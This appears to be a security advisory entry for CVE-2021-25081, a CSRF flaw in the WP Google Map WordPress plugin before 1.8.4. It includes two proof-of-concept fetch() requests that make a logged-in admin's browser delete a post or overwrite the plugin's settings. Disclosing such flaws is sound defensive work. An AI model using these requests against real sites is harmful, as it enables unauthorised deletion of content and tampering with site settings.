Lucene search
Krzysztof ZającWPEX-ID:F85CF258-1C2F-444E-91E5-B1FC55880F0EHistoryJan 27, 2022 - 12:00 a.m.
WP Google Map < 1.8.4 - Arbitrary Post Deletion and Plugin's Settings Update via CSRF
2022-01-2700:00:00
Krzysztof Zając
82
0.001 Low
EPSS
Percentile
30.5%
The plugin does not have CSRF checks in most of its AJAX actions, which could allow attackers to make logged in admins delete arbitrary posts and update the plugin’s settings via a CSRF attack
Removing post:
fetch("https://example.com/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"body": "action=wpgmapembed_remove_wpgmap&post_id=1",
"method": "POST",
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));
Updating settings:
fetch("https://example.com/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"body": "action=wpgmapembed_save_setup_wizard&wgm_api_key=hohohoho&wgm_language=999&wgm_regional_area=aaaaa",
"method": "POST",
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));
Related
patchstack
patchstack
prion
prion
Cross site request forgery (csrf)
2022-02-28 09:15:00
nvd
nvd
CVE-2021-25081
2022-02-28 09:15:08
cnvd
cnvd
WordPress Google Maps plugin cross-site request forgery vulnerability
2022-03-02 00:00:00
wpvulndb
wpvulndb
cve
cve
CVE-2021-25081
2022-02-28 09:15:08
cvelist
cvelist